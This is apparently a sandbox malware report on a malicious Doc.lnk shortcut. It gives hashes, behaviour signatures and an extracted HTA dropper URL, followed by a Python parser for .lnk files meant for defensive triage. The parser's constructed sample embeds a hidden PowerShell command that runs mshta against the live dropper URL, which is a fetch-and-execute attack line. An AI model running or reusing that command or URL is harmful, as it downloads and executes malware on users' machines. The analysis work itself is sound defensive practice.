General

  • Target

    Doc.zip

  • Size

    744B

  • Sample

    240522-f1lc5add2z

  • MD5

    34de20fe156557d6d6d0a371f70ec5d5

  • SHA1

    820a83383b023d71640c159f146bf14bee096d98

  • SHA256

    204b7ddb7313918dc965ad5335d350ec2457843a66141011ebec50b8ea0e05af

  • SHA512

    8d0df03876aa820498e2b3664ea4c673d621051b43fcf6bfee3f5e66beedc61e39734a1851013d475a4a902855765e7cfa2cb58d862815af5f518eae8e829633

Score
10/10

Malware Config

Extracted

  • Language

    hta

  • Source

  • URLs

    hta.dropper: https://foundationforwomenshealth.com/rooming.hta

Targets

    • Target

      Doc.lnk

    • Size

      1KB

    • MD5

      60f1320faf25bc20101c4312f82a72f8

    • SHA1

      a37a8f932db503eed34cbe9aa1db40f63b36fee1

    • SHA256

      bb26c65d29da78c698c19344058832b21593d27f4d89b5118345bb76614a564a

    • SHA512

      96652e9e0a96545449a260c19d920eb3f1debc879e76f5a594848a28ef165b733ca61fcc75636781289e30cc7e87aae11028ff159a1bdc93a274dbed99f03d07

    Score
    10/10
    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence.

    • Executes dropped EXE

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.

    • Suspicious use of SetThreadContext
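The report shows that Doc.lnk starts PowerShell and that the hta.dropper URL above was recovered from that task, but the LNK's own command line is not shown. The parser below is an added example, not part of the Triage report or its tooling: it reads the MS-SHLLINK ShellLinkHeader and StringData fields of a .lnk file to recover the relative target path, working directory and arguments, then pulls out embedded URLs and a few launch-time indicators an analyst checks first. The sample LNK it parses is constructed here; its command line (a hidden PowerShell handing the rooming.hta URL to mshta) is an assumption for illustration, not the contents of the real Doc.lnk.

```python
"""Offline triage of a Windows .lnk (MS-SHLLINK) file: recover the launch command.

Added example, not code from the Triage report. The SAMPLE_LNK built at the
bottom is CONSTRUCTED for demonstration; its command line is an assumption.
"""
import re
import struct
from dataclasses import dataclass, field
from typing import Optional

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# ShellLinkHeader.LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


@dataclass
class LnkReport:
    show_command: int
    name: Optional[str]
    relative_path: Optional[str]
    working_dir: Optional[str]
    arguments: Optional[str]
    icon_location: Optional[str]
    urls: list = field(default_factory=list)
    indicators: list = field(default_factory=list)


def _read_string(buf: bytes, off: int, unicode: bool):
    """StringData item: uint16 character count followed by the characters, no terminator."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    if len(raw) != count * width:
        raise ValueError("truncated StringData")
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", errors="replace")
    return text, off + count * width


def parse_lnk(data: bytes) -> LnkReport:
    """Parse header + StringData; LinkTargetIDList/LinkInfo are skipped, ExtraData ignored."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file (bad HeaderSize/CLSID)")
    (flags,) = struct.unpack_from("<I", data, 20)
    (show_command,) = struct.unpack_from("<I", data, 60)
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:      # uint16 IDListSize, then the item IDs
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                # uint32 LinkInfoSize, which includes itself
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    unicode = bool(flags & IS_UNICODE)
    strings = {}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                     ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                     ("icon_location", HAS_ICON_LOCATION)):
        strings[key], off = _read_string(data, off, unicode) if flags & bit else (None, off)
    return triage(LnkReport(show_command=show_command, **strings))


def triage(report: LnkReport) -> LnkReport:
    """Heuristic flags on the launch command; a starting point for analysis, not a verdict."""
    text = " ".join(s for s in (report.relative_path, report.working_dir, report.arguments) if s)
    low = text.lower()
    report.urls = URL_RE.findall(text)
    checks = [
        ("powershell" in low, "launches PowerShell"),
        ("mshta" in low or ".hta" in low, "references mshta / an HTA"),
        (re.search(r"-w(indowstyle)?\s+hid", low) is not None, "hidden window requested"),
        (re.search(r"-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}", low) is not None, "encoded command"),
        (report.show_command == SW_SHOWMINNOACTIVE, "ShowCommand=SW_SHOWMINNOACTIVE"),
        (bool(report.urls), "embedded URL"),
    ]
    report.indicators = [label for hit, label in checks if hit]
    return report


def build_lnk(relative_path: str, working_dir: str, arguments: str,
              show_command: int = SW_SHOWMINNOACTIVE, unicode: bool = True) -> bytes:
    """Build a minimal LNK (no IDList/LinkInfo/ExtraData) so the parser can be exercised offline."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    header = (struct.pack("<I", 0x4C) + LNK_CLSID
              + struct.pack("<II", flags, 0x20)       # LinkFlags, FileAttributes (ARCHIVE)
              + b"\x00" * 24                          # Creation/Access/Write FILETIMEs
              + struct.pack("<IiIHHII", 0, 0, show_command, 0, 0, 0, 0))
    assert len(header) == 76

    def s(text: str) -> bytes:
        raw = text.encode("utf-16-le") if unicode else text.encode("cp1252")
        return struct.pack("<H", len(text)) + raw

    return header + s(relative_path) + s(working_dir) + s(arguments)


# CONSTRUCTED sample (assumption): hidden PowerShell passing the report's hta.dropper
# URL to mshta. The real Doc.lnk command line is not shown on the page.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"%USERPROFILE%",
    '-w hidden -nop -c "mshta https://foundationforwomenshealth.com/rooming.hta"',
)

if __name__ == "__main__":
    r = parse_lnk(SAMPLE_LNK)
    print("target    :", r.relative_path)
    print("arguments :", r.arguments)
    print("urls      :", r.urls)
    print("indicators:", r.indicators)
```

Against a real sample, call parse_lnk(open("Doc.lnk", "rb").read()). Files that carry a LinkTargetIDList or LinkInfo are skipped over correctly, but the trailing ExtraData blocks (which can hold the creating host's volume serial and MAC address in the TrackerDataBlock) are not parsed here; parse those separately when attribution matters.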

MITRE ATT&CK Enterprise v15

Tasks